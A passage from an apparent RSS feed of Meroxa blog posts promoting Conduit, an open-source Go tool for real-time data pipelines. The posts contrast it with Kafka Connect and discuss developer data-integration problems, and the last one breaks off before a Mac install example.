&lt;p&gt;While your business goals may be focused on your external customers, your internal “customers” will have the same expectations when it comes to speed and accuracy of information. You can see this in the numerous companies that service internal teams. Those teams used to send that work to another internal team like IT. Teams found they could get their needs met from someone/company externally who could deliver on the promise more&lt;strong&gt;reliably and faster&lt;/strong&gt;. So, they pulled out that corporate card with a quickness.&lt;/p&gt;
&lt;p&gt;Not all time wasters are in shipping or inaccuracies though.&lt;strong&gt;A company can also show a lack of empathy by wasting the customer’s time with, for example, a design or data that is not actionable.&lt;/strong&gt; People have expectations in some of these areas already, but they will have expectations in all of them over time. It is best to understand it now.&lt;/p&gt;
&lt;p&gt;It might be boiled down to the time it takes to do something or even decide to do or not do something. We see an increase in&lt;strong&gt;frictionless design&lt;/strong&gt;. For example, “One-Click” buying, intuitive interface designs, intelligent options or defaults, and other time-savers.&lt;/p&gt;
&lt;p&gt;We now expect things to be “smooth”, if not, it feels like a waste of time.&lt;/p&gt;
&lt;p&gt;An example of internal vs external user experience that comes to mind is the difference between Amazon’s regular customer experience and that of AWS. The Amazon.com site meets (and sets) many of the expectations for speed and reliability. While using AWS often feels like the opposite. That may converge over time. If not, startups will continue to pop up around making a smoother experience to fill the gap.&lt;/p&gt;
&lt;p&gt;You may be thinking “ok, I get it, folks now expect things in “real-time” or as close to it as possible” soooo …what is the holdup?&lt;/p&gt;
&lt;h3&gt;What is holding us back?&lt;/h3&gt;
&lt;p&gt;There are a few things slowing, or in some cases stopping the realization of “everything real-time all the time!”. Some things we have to just live with, but others we can do something about.&lt;/p&gt;
&lt;h3&gt;Physics&lt;/h3&gt;
&lt;p&gt;One that rears its head is physics. If you work in tech for long you will eventually get the question “why is it taking so long?!”. Sometimes it can be fixed, but sometimes you just have to say “we have not figured out how to go faster than the speed of light”. If you wanna move 5TB of data across the world over the public internet, it just takes a bit of time. Sure you can get a dedicated, better pipe, but eventually, you hit the reach of our understanding of physics. If you want your product to magically appear after you order it? Same problem. Wouldn’t be great if when you needed salt, coffee, whatever,&lt;em&gt;bing&lt;/em&gt; it appeared. It would be like in that old show&lt;a href=&quot;https://en.wikipedia.org/wiki/I_Dream_of_Jeannie&quot;&gt;I dream of Jeannie&lt;/a&gt;. Well, that’s not going to happen, but we can make changes to get as close as possible.&lt;/p&gt;
&lt;h3&gt;Legacy Systems&lt;/h3&gt;
&lt;p&gt;If physics is not the limitation, another common one is that&lt;strong&gt;existing systems don’t support going faster&lt;/strong&gt;. It could be that it has not become cost-effective or there is not enough demand yet for that option or more often than not, it is a legacy industry that&lt;strong&gt;has not caught up&lt;/strong&gt; yet. The pandemic forced many companies to undergo a “Digital Transformation”. So, many are getting closer to the current expectation. This is good for them because the pandemic also forced a spread of the speed expectation as people broke out of their old habits. Whether because they were working from home, ordering online more or ordering food, etc.&lt;/p&gt;
&lt;h3&gt;Mindset&lt;/h3&gt;
&lt;p&gt;Another reason, that may seem silly, but is very common, is simply that the folks that are working on a system have&lt;strong&gt;not stepped back and thought about it&lt;/strong&gt;. Seriously, how many things do we do just because we have been doing it that way?&lt;/p&gt;
&lt;p&gt;Even in the days of the pervasive, high-speed internet, where it seems like everything has been done or made and you can have it delivered to your house for free in two days. Many of us don’t often step back and (re)think about&lt;strong&gt;why we are doing what we do&lt;/strong&gt; and if there is&lt;strong&gt;a better way&lt;/strong&gt;. If you made it this far, I am guessing you are not one of those people.&lt;/p&gt;
&lt;p&gt;We can’t change physics, but if you are reading this, you likely have the right mindset. That leaves updating the tools to support another “new normal”. A normal where “real-time” is the default.&lt;/p&gt;
&lt;p&gt;None of the systems can achieve “real-time” if the data it requires has not achieved it. So, we have to start there. This is where&lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt; and&lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt; come to the rescue.&lt;/p&gt;
&lt;p&gt;At&lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt;, we believe there is a better way to work with real-time data. We have created a company around helping developers reap the benefits of this real-time data world. A platform to make the integration and use of real-time data easier for developers.&lt;a href=&quot;https://docs.meroxa.com/getting-started/configure&quot;&gt;Come give us a try.&lt;/a&gt; :)&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Why Conduit? An evolutionary leap forward for real-time data integration.]]></title><description><![CDATA[Conduit is an open-source project to make real-time data integration easier for developers and operators. ]]></description><link>https://meroxa.com/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration</link><guid isPermaLink="false">https://meroxa.com/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Thu, 10 Feb 2022 20:57:00 GMT</pubDate><content:encoded>&lt;h3&gt;Who should read this?&lt;/h3&gt;
&lt;p&gt;Developers who build and/or manage data integration systems. It will be of specific interest to those working with real-time data pipelines, Kafka Connect, and managed streaming services.&lt;/p&gt;
&lt;h3&gt;Overview&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; is an open-source project to make real-time data integration easier for developers and operators. This article is broken into roughly the “Why” and the “How” behind Conduit.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#why-another-data-project&quot;&gt;Why bother creating “yet another” data project?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#why-we-should-build-it&quot;&gt;Why should WE build it?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#how-its-different&quot;&gt;How is Conduit different than Kafka Connect?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why bother creating “yet another” data project?&lt;/h3&gt;
&lt;p&gt;We could have simply written another blog post about the many frustrations of working with Kafka Connect for data integration, but we felt it was better to be part of the solution. So, we built and &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;open-sourced a project&lt;/a&gt;; a project that we use at &lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt;, that embodies the software development principles we have learned and live by. I will get into some of those principles and the thoughts behind the project in this post.&lt;/p&gt;
&lt;p&gt;The project is named &lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt;. While Conduit is not simply a Kafka Connect replacement, many of its features were informed by frustrations with Kafka Connect.&lt;/p&gt;
&lt;p&gt;Apache Kafka does a great job at being the backplane, but the business value and where more developers spend their time is with the connectors.&lt;/p&gt;
&lt;p&gt;We believe the data connector space is in need of some rethinking and innovation. We want to make connector development better suited for developer velocity and operational best practices.&lt;/p&gt;
&lt;p&gt;We are not alone in the belief that this space is ripe for innovation. Jay Kreps (co-creator of Apache Kafka) has mentioned the innovations still needed in the connector space in his recent Keynote and in tweets like this &lt;a href=&quot;https://twitter.com/jaykreps/status/1454120042530938890&quot;&gt;one&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1242/1*6zxXGsDXwEaiUTbpKAXDYw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Why should WE build it?&lt;/h3&gt;
&lt;p&gt;We are a group of developers that have spent our careers developing software for large-scale deployments such as &lt;a href=&quot;https://www.heroku.com/managed-data-services&quot;&gt;Heroku&lt;/a&gt;. Most of the software services/platforms we have worked on in recent years have been in the context of building and managing data services such as Apache Kafka and Kafka connectors.&lt;/p&gt;
&lt;p&gt;In that time, we have learned many things about what works well and what leads to issues when developing and supporting large-scale systems. The good news is that most aspects that make a large system easier to tame also cascade down to making a small system pleasant to work with as well. While the opposite is not true.&lt;/p&gt;
&lt;p&gt;One benefit in the world of software is that developers have collectively spent a lot of time working out effective methodologies. We have aspirations like “&lt;strong&gt;Optimized for Developer Happiness&lt;/strong&gt;”. Many of those methodologies have influenced and helped us build better software at Meroxa. Such concepts as &lt;a href=&quot;https://en.wikipedia.org/wiki/Agile_software_development&quot;&gt;Agile&lt;/a&gt; and &lt;a href=&quot;https://12factor.net/&quot;&gt;12 Factor Apps&lt;/a&gt; have created certain expectations when working on projects and what a “good” project looks and feels like.&lt;/p&gt;
&lt;p&gt;With those concepts as a background context, and years of working with Kafka Connect, we decided that we needed a better way to solve data integration problems. A way that adhered to our expectations of maintainable software services. While some concepts are just baked into the project because they are baked into the Meroxa DNA, below are some worth highlighting because they directly contrast with Kafka Connect.&lt;/p&gt;
&lt;h3&gt;How is Conduit different than Kafka Connect?&lt;/h3&gt;
&lt;h3&gt;Easy local development&lt;/h3&gt;
&lt;p&gt;Kafka Connect requires a lot of setup (e.g. Apache Kafka, Zookeeper etc) to get to a point of doing development or even “kicking the tires”. It is a very time-consuming development life cycle. Attempting to quickly iterate on code or test things in isolation is very frustrating or impossible. In addition to that, because of all the external dependencies, you may end up with a mismatch between your local setup and what is actually in production or another developer’s environment.&lt;/p&gt;
&lt;p&gt;Conduit addresses these issues in a few ways.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;single Go binary&lt;/a&gt; with no external dependencies. Download, run it, get going. No additional infrastructure needed.&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit#ui&quot;&gt;built-in Web UI&lt;/a&gt;. When you run that binary you can access the Web UI and try out configurations with very little upfront knowledge. Allowing you “play” with it out of the box.&lt;/li&gt;
&lt;li&gt;SDK to simplify the connector development and testing. (Discussed later)&lt;/li&gt;
&lt;li&gt;Easy, isolated local testing and test data generation. (Discussed later)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;🗣 &lt;a href=&quot;https://github.com/ConduitIO/conduit#installation-guide&quot;&gt;Conduit installation guide&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ez6TtY28JNJoz5YBCCl_YQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;SDK to speed up development&lt;/h3&gt;
&lt;p&gt;Starting to develop connectors with Kafka Connect is confusing and complicated. You are not encouraged when at every turn the documentation implies that dragons are around the corner and you should just pay to have the connectors handled for you. Can’t we just have an SDK?&lt;/p&gt;
&lt;p&gt;We are &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/37&quot;&gt;working on a SDK&lt;/a&gt; to make it easy for you. Since our work is “in public”, you can keep an eye on what we are up to.&lt;/p&gt;
&lt;h3&gt;Connector development is language agnostic&lt;/h3&gt;
&lt;p&gt;Kafka Connectors are very Java-centric. While you can shoehorn other language support into working, it is not the suggested path and can be painful to maintain and not performant.&lt;/p&gt;
&lt;p&gt;Conduit connectors are plugins that communicate with Conduit via a gRPC interface. This means that &lt;strong&gt;plugins can be written in any language&lt;/strong&gt; as long as they conform to the standards-based interface.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.conduit.io/docs/introduction/architecture&quot;&gt;Conduit architecture diagram.&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Standard API Protocols&lt;/h3&gt;
&lt;p&gt;Conduit supports &lt;a href=&quot;https://grpc.io/docs/what-is-grpc/introduction/&quot;&gt;gRPC&lt;/a&gt; &lt;strong&gt;and REST for its management&lt;/strong&gt;, making it easy to manage with software at scale. Plugins utilize &lt;strong&gt;gRPC for data movement&lt;/strong&gt; and soon it will support the Kafka Connect API as well.&lt;/p&gt;
&lt;p&gt;We believe gRPC is the best choice for streaming data APIs. In addition to the &lt;a href=&quot;https://grpc.io/blog/principles/&quot;&gt;benefits&lt;/a&gt; of using gRPC for data movement, a large number of community members, projects, &lt;a href=&quot;https://grpc.io/docs/languages/&quot;&gt;programming languages&lt;/a&gt; and &lt;a href=&quot;https://grpc.io/docs/platforms/&quot;&gt;platforms&lt;/a&gt; supported make it a perfect choice for a data project such as Conduit.&lt;/p&gt;
&lt;p&gt;In contrast, Kafka Connect uses a custom binary protocol for data and a REST API or java property file for configuration. What this means is that client libraries have to be built and maintained as separate projects that are only useful in the Kafka ecosystem. We will also support the Kafka Connect API to allow you to migrate over existing connectors.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.conduit.io/docs/introduction/architecture&quot;&gt;Conduit architecture diagram.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#api&quot;&gt;Conduit API information&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Testing&lt;/h3&gt;
&lt;p&gt;Testing a &lt;strong&gt;Kafka connector&lt;/strong&gt; &lt;strong&gt;requires a lot of infrastructure&lt;/strong&gt;, visibility is poor, is too prone to misleading errors and generating test data is a pain. Instead of iterating on your code, you feel like you are testing a whole collection of infrastructure you have cobbled together, that may not look like production anyway. So, what were you really testing?&lt;/p&gt;
&lt;p&gt;Testing with Conduit — since the connector and the &lt;strong&gt;dependencies are decoupled&lt;/strong&gt; you can test your changes in &lt;a href=&quot;https://12factor.net/dependencies&quot;&gt;isolation&lt;/a&gt; from the environment. We have created a &lt;a href=&quot;https://github.com/ConduitIO/conduit/tree/main/pkg/plugins/generator&quot;&gt;test data generator&lt;/a&gt; and data validator to save you from wasting time trying to create test data to verify your connector is working.&lt;/p&gt;
&lt;h3&gt;Free and Open&lt;/h3&gt;
&lt;p&gt;Many Kafka Connectors can not be used by us at all. The limitations on the licenses create situations where you are either &lt;strong&gt;locked into&lt;/strong&gt; &lt;strong&gt;the Confluent platform&lt;/strong&gt; to continue use or in other cases you may be compliant but then as your business grows and involves you unknowingly move into a violation. Many developers experienced the pain with the &lt;a href=&quot;https://www.confluent.io/confluent-community-license-faq/&quot;&gt;license shift&lt;/a&gt; that Confluent made a few years ago. It sucks to find yourself in that situation. We don’t want that to happen to you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit is free to use and open source&lt;/strong&gt;. The &lt;strong&gt;license is permissible&lt;/strong&gt; and encourages developers to utilize and get value from it in their projects. We are strong believers in the value of standards and open source and that we should not be creating situations for lock-in or crippling projects and use cases.&lt;/p&gt;
&lt;h3&gt;Monitoring&lt;/h3&gt;
&lt;p&gt;Kafka Connect uses &lt;strong&gt;JMX for metrics&lt;/strong&gt;. We found this to be cumbersome to work with and required additional setup to get metrics into our metrics platform.&lt;/p&gt;
&lt;p&gt;Conduit supports sending metrics to &lt;a href=&quot;https://prometheus.io/&quot;&gt;&lt;strong&gt;Prometheus&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;right out of the box&lt;/strong&gt;. Prometheus is our preferred metrics platform as well as most developers we have heard from.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/metrics.md&quot;&gt;Conduit metrics exposed&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Go vs Java&lt;/h3&gt;
&lt;p&gt;Kafka Connect is built with Java. For our use case, building a multi-tenant platform that leverages Kafka Connect wasn’t economical. Each provisioned connector took up a ton of memory, sometimes in excess of 1GB. If the usage isn’t consistent, you end up with a bunch of provisioned resources that didn’t have a lot of utilization.&lt;/p&gt;
&lt;p&gt;Go uses very little resources, compiles to a small deployable binary, has a fast startup/shutdown time, is very stable, very performant and has a &lt;a href=&quot;https://go.dev/solutions/#case-studies&quot;&gt;large community of projects&lt;/a&gt; and support.&lt;/p&gt;
&lt;p&gt;Conduit leverages Goroutines that are connected using Go channels. Goroutines can take up as little as 2kB of memory. These basic functions can run simultaneously and independently, making multiple processes very efficient on multi-core machines. Unlike Java threads that consume large amounts of memory, Goroutines, which are used instead of threads, require much less RAM lowering the risk of crashing due to lack of memory.&lt;/p&gt;
&lt;p&gt;The small binary size and resource usage provide a variety of benefits. At the large scale, say, If you are building a managed service like us, small memory use, faster boot times, minimal dependencies, small file size, etc translate into actual dollars saved on resources as well as a better user experience. On the small side of the scale, it means you can deploy to even a Raspberry Pi or to places we have not yet considered. But, even for just local development, it means getting up and going and productive quickly.&lt;/p&gt;
&lt;p&gt;There are good reasons for Go becoming the language of choice for infrastructure and operation services such as Kubernetes, Terraform, Docker and others. Conduit is built to fit well into that ecosystem, which means better integration and support going forward. The value of a strong community is hard to overstate.&lt;/p&gt;
&lt;h3&gt;Easy Transformations&lt;/h3&gt;
&lt;p&gt;Kafka Connect requires you to write &lt;strong&gt;transformations in Java&lt;/strong&gt; and implement a pile of files and functions via a confusing process with little help. It is more complicated than it needs to be. Transformations are widely needed in data pipelines by people even if they don’t build connectors. Transformations should be approachable and easy.&lt;/p&gt;
&lt;p&gt;In Conduit, &lt;strong&gt;transformations are written in JavaScript&lt;/strong&gt;. JavaScript is one of the most widely known development languages. Most developers already have to know JavaScript even if they also use another language as well.&lt;/p&gt;
&lt;h3&gt;Pipeline Centric&lt;/h3&gt;
&lt;p&gt;Kafka Connect is connector-centric which puts data transformations etc in the background and ties them to the specific connectors, this is problematic because we want to build pipelines, not just connectors. The goal is easy pipelines for real-time data. When you think in terms of pipelines you also make different choices for things like transformations. For example, in the Kafka Connect world the transformation only sits between the source and destination.&lt;/p&gt;
&lt;p&gt;Conduit decouples where the transformation sits allowing you to transform from a source and or into a destination. Meaning that your pipeline can take into account how data enters and leaves it as different operations.&lt;/p&gt;
&lt;p&gt;Conduit considers pipelines the primary goal and the &lt;a href=&quot;https://www.conduit.io/docs/introduction/architecture&quot;&gt;architecture&lt;/a&gt; reflects that.&lt;/p&gt;
&lt;h3&gt;Ready to get started with Conduit?&lt;/h3&gt;
&lt;p&gt;Stay up to date with what we are working on, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;Github Project board&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Review the documentation at the main &lt;a href=&quot;https://www.conduit.io/&quot;&gt;website&lt;/a&gt; as well as the &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;github repo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Find out &lt;a href=&quot;https://github.com/ConduitIO/conduit#contributing&quot;&gt;how to contribute&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Install Conduit by following the &lt;a href=&quot;https://github.com/ConduitIO/conduit#installation-guide&quot;&gt;installation guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Easily migrate from Kafka Connect&lt;/h3&gt;
&lt;p&gt;Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;will support&lt;/a&gt; the Kafka Connect API. This will allow you to bring your existing connectors.&lt;/p&gt;
&lt;h3&gt;Do you have feedback?&lt;/h3&gt;
&lt;p&gt;What are your struggles with data integration?&lt;/p&gt;
&lt;p&gt;What are we missing?&lt;/p&gt;
&lt;p&gt;What would you add to the requirements list?&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Where is the modern data stack for software engineers?]]></title><description><![CDATA[The Future of the Modern Data Stack looks excellent for data engineers. But where is the modern data stack for software engineers?]]></description><link>https://meroxa.com/blog/where-is-the-modern-data-stack-for-software-engineers</link><guid isPermaLink="false">https://meroxa.com/blog/where-is-the-modern-data-stack-for-software-engineers</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 04 Feb 2022 20:34:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://blog.getdbt.com/future-of-the-modern-data-stack/&quot;&gt;The Future of the Modern Data Stack&lt;/a&gt; looks excellent for data engineers. However, as a software engineer, I kind of feel left out. Where is the modern data stack for software engineers?&lt;/p&gt;
&lt;p&gt;Marketing teams and data engineers need data to answer questions; software engineers need data to build features. This difference is why you’ll find that tools like&lt;a href=&quot;http://segment.com/&quot;&gt;Segment&lt;/a&gt; don’t have connections for tools like ElasticSearch (Search Engine) or Redis (Cache).&lt;/p&gt;
&lt;p&gt;A business may use the modern data stack to ask better questions about what’s happening in their business, applications, etc. A modern data stack is critical today if you want to succeed. Also, this world is filling fast with new SaaS data products and tools in abundance.&lt;/p&gt;
&lt;p&gt;Here, I’d like to present a slightly different data problem for a separate data audience, software engineers.&lt;/p&gt;
&lt;p&gt;Software engineers leverage data infrastructure in a very different way. The tools aren’t Google Analytics and&lt;a href=&quot;https://clearbit.com/&quot;&gt;Clearbit&lt;/a&gt;, but&lt;a href=&quot;https://upstash.com/&quot;&gt;Upstash&lt;/a&gt; and&lt;a href=&quot;https://supabase.com/&amp;#x27;&quot;&gt;Supabase&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Engineers need to move data back and forth to build features and infrastructure that adds customer value.&lt;/p&gt;
&lt;p&gt;Where are my tools to help me use&lt;strong&gt;code&lt;/strong&gt; to move, process, or manipulate data between my application infrastructure? Today, I see a lot of one-off scripts, custom microservices, or tools that require me to scale a JVM.&lt;/p&gt;
&lt;h3&gt;The Data Integration Problem.&lt;/h3&gt;
&lt;p&gt;I want to tell you about a problem that every software engineer experiences: the data integration problem.&lt;/p&gt;
&lt;p&gt;Due to infrastructure becoming easier to acquire and amazing tools like&lt;a href=&quot;https://www.heroku.com/&quot;&gt;Heroku&lt;/a&gt;,&lt;a href=&quot;https://render.com/&quot;&gt;Render&lt;/a&gt;,&lt;a href=&quot;http://planetscale.com/&quot;&gt;PlanetScale&lt;/a&gt;,&lt;a href=&quot;https://upstash.com/&quot;&gt;Upstash&lt;/a&gt; and&lt;a href=&quot;https://supabase.com/&amp;#x27;&quot;&gt;Supabase&lt;/a&gt;, it’s getting easier to acquire new data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;data infrastructure — a new system that generates or stores data.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Keep this definition in mind; it’s crucial.&lt;/p&gt;
&lt;p&gt;In general, writing software is becoming more &lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; every day. Engineers commonly pull data from all sorts of places from within (or without) our infrastructure to build applications that are &lt;a href=&quot;https://www.amazon.com/Designing-Data-Intensive-Applications-Reliable-Maintainable/dp/1449373321&quot;&gt;data-intensive&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Data-intensive applications are complex and made up of many systems like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;multiple microservices&lt;/li&gt;
&lt;li&gt;caches&lt;/li&gt;
&lt;li&gt;databases&lt;/li&gt;
&lt;li&gt;event brokers&lt;/li&gt;
&lt;li&gt;data warehouse&lt;/li&gt;
&lt;li&gt;search engines&lt;/li&gt;
&lt;li&gt;log aggregation systems&lt;/li&gt;
&lt;li&gt;CRM&lt;/li&gt;
&lt;li&gt;analytics platforms&lt;/li&gt;
&lt;li&gt;… and third-party tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our software systems contain many specialized tools that accelerate development and growth. These additional tools and platforms solve real problems and help teams move fast. But, there is one catch.&lt;/p&gt;
&lt;p&gt;We are slowly acquiring more specialized data infrastructure if you zoom out a bit. A distributed data infrastructure means that our systems generate and consume data from &lt;em&gt;more and more&lt;/em&gt; data stores.&lt;/p&gt;
&lt;p&gt;If not appropriately managed, the number of “data tasks” will continue to increase. This means we will keep spending less time building features and spend more time integrating data.&lt;/p&gt;
&lt;p&gt;I’m not sure this is what we want.&lt;/p&gt;
&lt;p&gt;I keep asking myself: Is spending tons of time moving data around a valuable activity for software engineers?&lt;/p&gt;
&lt;p&gt;Today, there are production tools that software engineers may use to solve this problem, like Apache Kafka and Airflow. But deploying and managing these systems isn’t the greatest experience and requires people on your team whose only job is to manage these systems.&lt;/p&gt;
&lt;p&gt;I’d argue that “easy data movement for developers” is still a super unsolved problem.&lt;/p&gt;
&lt;h3&gt;The data-centric developer mindset&lt;/h3&gt;
&lt;p&gt;I’m not sure this is even a problem that will go away. We will continue to use specialized tools that accelerate development and growth. In most cases:&lt;/p&gt;
&lt;p&gt;ElasticSearch will always offer a better developer experience for searching than MySQL.&lt;/p&gt;
&lt;p&gt;Snowflake will always offer a better developer experience for data warehousing than PostgresSQL.&lt;/p&gt;
&lt;p&gt;There will be no magic data store 🪄. We will forever be in a data ecosystem that won’t consolidate much because data infrastructure will always have design decisions that will be good for one use case and possibly poor for others.&lt;/p&gt;
&lt;p&gt;With that being said, the&lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; mindset is becoming more common when building software.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*NxGu1WiC1WqTUPL8&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;With data at the forefront of system design, engineers who used to ask themselves: “What database will I use for this application?”. Will now be asking themselves: “How will this new application integrate with my data infrastructure.”&lt;/p&gt;
&lt;p&gt;The next generation of applications will be built with a data-first mindset.&lt;/p&gt;
&lt;h3&gt;What is the data integration problem?&lt;/h3&gt;
&lt;p&gt;Now, we can look at this problem from a data-centric mindset. Data integration problems are tasks that take the following form:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data in system A needs to get to system B.&lt;/li&gt;
&lt;li&gt;Data changes in A need to be continuously replicated into B.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can map a vast landscape of problems to these. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Log Aggregation&lt;/li&gt;
&lt;li&gt;Syncing data from PostgreSQL to Redis for caching.&lt;/li&gt;
&lt;li&gt;Listening to changes from a PostgreSQL table and writing them to a data warehouse.&lt;/li&gt;
&lt;li&gt;Watching a file for changes and writing the changes to a database.&lt;/li&gt;
&lt;li&gt;Consuming data from a Kafka topic and writing it somewhere else.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you squint and tilt your head to the side, you’ll notice that all of these problems are moving data from one place to another. These problems are specific to any specific industry; it applies to software engineering as a whole.&lt;/p&gt;
&lt;p&gt;Some problems, such as the need for data warehousing you’d hit as you scale; others, like streaming data from a log, are ubiquitous amongst most software engineers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We always code first, think later.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;These problems move data from one place to another, yet we typically use different tools or build a custom tool. Moving data from one place to another is a task that looks simple on the surface, mainly because it’s super convenient to write a small service that does the data task you need.&lt;/p&gt;
&lt;p&gt;But, most will eventually find that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Datastores and schemas improve, change and update over time.&lt;/li&gt;
&lt;li&gt;Managing real-time syncing between data infrastructure is 🥲.&lt;/li&gt;
&lt;li&gt;Relying on external data infrastructure (SaSS tools, External APIs) is impossible.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Then, some may then discover&lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;The Log&lt;/a&gt; and adopt Kafka. Kafka is an&lt;em&gt;outstanding&lt;/em&gt; event-based streaming broker. But, it’s a massive addition to your infrastructure just to move data from one place to another.&lt;/p&gt;
&lt;h3&gt;What Now?&lt;/h3&gt;
&lt;p&gt;This is why we are working on a project called&lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; at Meroxa. We hope to change the experience software engineers have with data.&lt;/p&gt;
&lt;p&gt;At a high level, Conduit is a data streaming tool written in GoLang. It aims to provide the best software developer experience for building and running real-time data pipelines.&lt;/p&gt;
&lt;p&gt;I’d love to know what you think, and I’d love to see more data tools for software engineers.&lt;/p&gt;
&lt;p&gt;Thank you for reading. Have a beautiful day ☀️&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit: Streaming Data Integration for Developers]]></title><description><![CDATA[We’re open-sourcing Conduit, Meroxa’s data integration tool built to be flexible & extendible, and provide developer-friendly streaming data orchestration.]]></description><link>https://meroxa.com/blog/conduit-streaming-data-integration-for-developers</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-streaming-data-integration-for-developers</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 21 Jan 2022 20:38:00 GMT</pubDate><content:encoded>&lt;p&gt;Let’s be honest, spending tons of time moving data around is not a fun or valuable activity for software engineers. Most of the tooling to solve this problem primarily targets data analysts or data engineers, not software engineers.&lt;/p&gt;
&lt;p&gt;Today, the tooling for software engineers is incredibly complex and challenging to operate. For example, we have to install distributed systems with multiple dependencies, which also happen to be distributed systems 🙃 .&lt;/p&gt;
&lt;p&gt;Moving data between data infrastructures should be much easier and free.
Today, we’re happy to announce that we’re open-sourcing Conduit, Meroxa’s data integration tool built to be flexible, extendible, and provide developer-friendly streaming data orchestration.&lt;/p&gt;
&lt;p&gt;Writing software is becoming more&lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; every day. Software engineers now commonly pull data from all sorts of places from within (or without) their infrastructure to provide data-driven features to their users.&lt;/p&gt;
&lt;p&gt;Let’s make that easier.&lt;/p&gt;
&lt;h3&gt;Getting Started with Conduit&lt;/h3&gt;
&lt;p&gt;To get started with Conduit, you can head over to our&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.1.0&quot;&gt;GitHub releases page&lt;/a&gt; and:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Download Conduit Binary&lt;/li&gt;
&lt;li&gt;Unzip&lt;/li&gt;
&lt;li&gt;Build Pipelines 🚀&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you’re on Mac, it will look something like this:&lt;/p&gt;
